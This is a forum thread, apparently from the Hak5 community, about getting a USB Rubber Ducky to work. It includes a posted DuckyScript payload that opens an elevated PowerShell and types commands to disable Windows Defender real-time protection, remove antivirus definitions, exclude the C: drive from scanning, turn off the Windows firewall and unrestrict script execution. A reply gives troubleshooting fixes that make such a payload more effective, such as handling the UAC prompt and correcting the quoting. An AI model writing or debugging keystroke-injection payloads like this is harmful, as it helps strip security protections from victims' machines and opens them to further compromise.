Rusty_83 Posted March 28 Share Posted March 28 Hi, I've just received the rubber ducky and as far as I can tell, the ducky doesn't do a single thing. I've used the payload generator to create the inject.bin file, replaced the inject.bin file on the root of the ducky and tried a number of scripts, but simply nothing happens when I insert the USB. When I press the button, the ducky returns to STORAGE mode and I can see the USB device 'DUCKY'. The LED is constantly green. I'm using Windows 11. What am I doing wrong? Thanks for any help Quote Link to comment Share on other sites More sharing options...
Irukandji Posted March 28 Share Posted March 28 Have you tried? https://payloadstudio.hak5.org/ Quote Link to comment Share on other sites More sharing options...
dark_pyrro Posted March 28 Share Posted March 28 4 hours ago, Rusty_83 said: tried a number of scripts What scripts? It's much easier to try to help troubleshoot things when knowing as much as possible about what's been tried and not. Pick 1 payload that isn't working. Quote Link to comment Share on other sites More sharing options...
Rusty_83 Posted March 28 Author Share Posted March 28 14 hours ago, dark_pyrro said: What scripts? It's much easier to try to help troubleshoot things when knowing as much as possible about what's been tried and not. Pick 1 payload that isn't working. Ok I'm not sure what exactly I've done differently, but all seems to be working now on the ducky. However I haven't been able to disable Windows Defender. The script I used is as follows: ------------------------------------------- DELAY 3000 GUI x DELAY 500 STRINGLN a DELAY 1000 ATTACKMODE HID DELAY 500 REM STAGE 2 Stop Windows Defender Anti Virus******** REM STRINGLN Set-MpPreference -DisableRealtimeMonitoring $true; REM STRINGLN powershell.exe -Command "& {Set-ExecutionPolicy-ExecutionPolicy REM Unrestricted}" DELAY 1000 STRINGLN cd "c:\program files\windows defender"; ".\mpcmdrun.exe -RemoveDefinitions -All Set-MpPreference - Disable!OAVProtection $true"; DELAY 1000 STRINGLN ".\mpcmdrun.exe Add-MpPreference-ExclusionPath c:\"; DELAY 500 STRINGLN Set-MpPreference -DisableRealtimeMonitoring $true; DELAY 1000 STRINGLN netsh advfirewall set allprofiles state off DELAY 1000 STRINGLN Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false DELAY 1000 SHIFT y DELAY 500 ENTER; ----------------------------------------------------- However Windows Defender is still running. Any ideas? Quote Link to comment Share on other sites More sharing options...
dark_pyrro Posted March 29 Share Posted March 29 8 hours ago, Rusty_83 said: DELAY 3000 Not really important in terms of getting the payload in general to work, but instead of using the initial delay, you could use the PASSIVE_WINDOWS_DETECT extension since the target is Windows based. 8 hours ago, Rusty_83 said: GUI x DELAY 500 STRINGLN a DELAY 1000 Something's missing in this code block. Usually, you need to confirm the elevated terminal/console, but I can't see that here (i.e. "Yes" has to be pressed to get to the elevated prompt). A longer delay is perhaps also needed, but it depends on the performance of the target and how fast it can open the PowerShell window. 9 hours ago, Rusty_83 said: ATTACKMODE HID DELAY 500 This shouldn't be necessary since the default ATTACKMODE for the Ducky is ATTACKMODE HID. And, if it wasn't, it still had to be moved to the top of the payload since keystrokes are entered before ATTACKMODE HID is introduced in the payload code. 9 hours ago, Rusty_83 said: STRINGLN cd "c:\program files\windows defender"; ".\mpcmdrun.exe -RemoveDefinitions -All Set-MpPreference - Disable!OAVProtection $true"; Try running this line manually exactly the way it looks. What is the result? It will cd into the directory, but then just echo the rest of the commands. Remove the quote marks around the commands and try it again. Any difference? A general tip is that if something isn't working, try running it manually and see what the results are. It will help a lot when troubleshooting. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.